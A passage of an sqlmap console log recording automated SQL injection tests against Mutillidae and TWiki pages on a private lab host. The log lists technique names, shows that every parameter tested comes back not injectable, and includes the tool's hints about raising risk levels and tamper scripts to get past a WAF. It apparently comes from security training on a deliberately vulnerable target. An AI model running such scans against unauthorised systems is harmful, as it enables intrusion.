[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=text-file-viewer.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=user-info.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=browser-info.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=login.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=source-viewer.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=arbitrary-file-inclusion.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=add-to-your-blog.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=secret-administrative-pages.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=credits.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=source-viewer.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=framing.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=change-log.htm' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=installation.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=documentation/vulnerabilities.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=usage-instructions.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=php-errors.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=notes.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=arbitrary-file-inclusion.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=arbitrary-file-inclusion.php' | |
URL 6: | |
GET http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:00] [INFO] testing URL 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.10&rev2=1.9' | |
[18:19:00] [INFO] testing connection to the target URL | |
[18:19:00] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests | |
[18:19:00] [INFO] testing if the target URL is stable | |
[18:19:01] [INFO] target URL is stable | |
[18:19:01] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:19:01] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:19:01] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:19:01] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:02] [INFO] testing 'MySQL inline queries' | |
[18:19:02] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:02] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:19:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:03] [WARNING] GET parameter 'rev1' is not injectable | |
[18:19:03] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:19:03] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:19:03] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:19:03] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:19:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:03] [INFO] testing 'MySQL inline queries' | |
[18:19:03] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:04] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:05] [WARNING] GET parameter 'rev2' is not injectable | |
[18:19:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:19:05] [WARNING] HTTP error codes detected during run: | |
400 (Bad Request) - 469 times | |
URL 7: | |
GET http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.9 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:05] [INFO] testing URL 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.9' | |
[18:19:05] [INFO] testing connection to the target URL | |
[18:19:05] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests | |
[18:19:05] [INFO] testing if the target URL is stable | |
[18:19:06] [INFO] target URL is stable | |
[18:19:06] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:19:06] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:19:06] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:19:06] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:19:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:06] [INFO] testing 'MySQL inline queries' | |
[18:19:06] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:06] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:19:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:07] [WARNING] GET parameter 'rev' is not injectable | |
[18:19:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:19:07] [WARNING] HTTP error codes detected during run: | |
400 (Bad Request) - 236 times | |
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.9&rev2=1.8' | |
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.8' | |
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.8&rev2=1.7' | |
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.7' | |
URL 8: | |
GET http://192.168.1.113:80/../oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:07] [INFO] testing URL 'http://192.168.1.113:80/../oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10' | |
[18:19:07] [INFO] testing connection to the target URL | |
[18:19:07] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests | |
[18:19:07] [INFO] testing if the target URL is stable | |
[18:19:08] [INFO] target URL is stable | |
[18:19:08] [INFO] testing if GET parameter 'template' is dynamic | |
[18:19:08] [WARNING] GET parameter 'template' does not appear dynamic | |
[18:19:08] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:19:08] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:09] [INFO] testing 'MySQL inline queries' | |
[18:19:09] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:09] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:19:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:10] [WARNING] GET parameter 'template' is not injectable | |
[18:19:10] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:19:10] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:19:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:19:10] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:19:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:10] [INFO] testing 'MySQL inline queries' | |
[18:19:10] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:10] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:11] [WARNING] GET parameter 'param1' is not injectable | |
[18:19:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:19:11] [WARNING] HTTP error codes detected during run: | |
400 (Bad Request) - 469 times | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=add-to-your-blog.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=add-to-your-blog.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=site-footer-xss-discussion.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=site-footer-xss-discussion.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=php-errors.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=php-errors.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=browser-info.php' | |
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=browser-info.php' | |
URL 9: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebHome?t=1441456557 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebHome?t=1441456557' | |
[18:19:11] [INFO] testing connection to the target URL | |
[18:19:12] [INFO] testing if the target URL is stable | |
[18:19:13] [INFO] target URL is stable | |
[18:19:13] [INFO] testing if GET parameter 't' is dynamic | |
[18:19:13] [WARNING] GET parameter 't' does not appear dynamic | |
[18:19:13] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:19:13] [INFO] testing for SQL injection on GET parameter 't' | |
[18:19:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:17] [INFO] testing 'MySQL inline queries' | |
[18:19:17] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:21] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:19:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:34] [WARNING] GET parameter 't' is not injectable | |
[18:19:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 10: | |
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:19:34] [INFO] testing connection to the target URL | |
[18:19:34] [INFO] testing if the target URL is stable | |
[18:19:35] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:19:35] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:19:35] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:19:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:19:35] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:19:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:36] [WARNING] reflective value(s) found and filtering out | |
[18:19:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:19:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:19:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:19:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:19:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:19:39] [INFO] testing 'MySQL inline queries' | |
[18:19:39] [INFO] testing 'PostgreSQL inline queries' | |
[18:19:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:19:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:19:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:19:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:19:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:19:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:19:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:19:43] [INFO] testing 'Oracle AND time-based blind' | |
[18:19:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:19:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:19:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:56] [WARNING] URI parameter '#1*' is not injectable | |
[18:19:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 11: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:19:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print' | |
[18:19:56] [INFO] testing connection to the target URL | |
[18:19:56] [INFO] testing if the target URL is stable | |
[18:19:57] [INFO] target URL is stable | |
[18:19:57] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:19:57] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:19:57] [INFO] GET parameter 'skin' is dynamic | |
[18:19:57] [INFO] heuristics detected web page charset 'ascii' | |
[18:19:57] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:19:58] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:19:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:19:58] [WARNING] reflective value(s) found and filtering out | |
[18:19:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:19:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:20:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:20:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:20:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:20:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:20:02] [INFO] testing 'MySQL inline queries' | |
[18:20:03] [INFO] testing 'PostgreSQL inline queries' | |
[18:20:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:20:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:20:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:20:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:20:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:20:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:20:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:20:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:20:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:20:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:20:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:20:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:20:24] [WARNING] GET parameter 'skin' is not injectable | |
[18:20:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 12: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:20:24] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20' | |
[18:20:24] [INFO] testing connection to the target URL | |
[18:20:24] [INFO] testing if the target URL is stable | |
[18:20:25] [INFO] target URL is stable | |
[18:20:25] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:20:25] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:20:25] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:20:26] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:20:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:20:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:20:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:20:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:20:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:20:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:20:29] [INFO] testing 'MySQL inline queries' | |
[18:20:29] [INFO] testing 'PostgreSQL inline queries' | |
[18:20:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:20:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:20:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:20:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:20:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:20:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:20:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:20:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:20:33] [INFO] testing 'Oracle AND time-based blind' | |
[18:20:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:20:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:20:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:20:46] [WARNING] GET parameter 'rev1' is not injectable | |
[18:20:46] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:20:47] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:20:47] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:20:47] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:20:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:20:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:20:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:20:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
